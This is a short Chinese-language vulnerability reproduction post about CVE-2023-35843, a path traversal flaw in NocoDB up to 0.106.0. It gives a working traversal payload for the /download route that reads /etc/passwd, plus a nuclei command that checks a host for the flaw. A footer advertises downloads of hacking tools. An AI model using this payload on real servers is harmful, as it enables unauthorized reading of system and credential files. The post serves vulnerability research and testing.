正文

【漏洞复现】NocoDB File Read CVE-2023-35843(POC)

admin
admin V管理员 /0 评论 /42 阅读
1016
此篇文章发布距今已超过38天,您需要注意文章的内容或图片是否可用!

免责声明

本公众号所提供的文字和信息仅供学习和研究使用,请读者自觉遵守法律法规,不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任







漏洞简述

NocoDB 到 0.106.0(或 0.109.1)存在路径遍历漏洞,允许未经身份验证的攻击者通过操纵 /download 路由的路径参数来访问服务器上的任意文件。此漏洞可能允许攻击者访问服务器上的敏感文件和数据,包括配置文件、源代码和其他敏感信息。

漏洞影响

NocoDB <= 0.106.0

漏洞复现

登陆页面如下:

POC:   /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

nuclei 验证漏洞存在

nuclei -u http://xxx.xxx.xxx.xxx:9009 -id CVE-2023-35843 --debug

获取 POC


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下网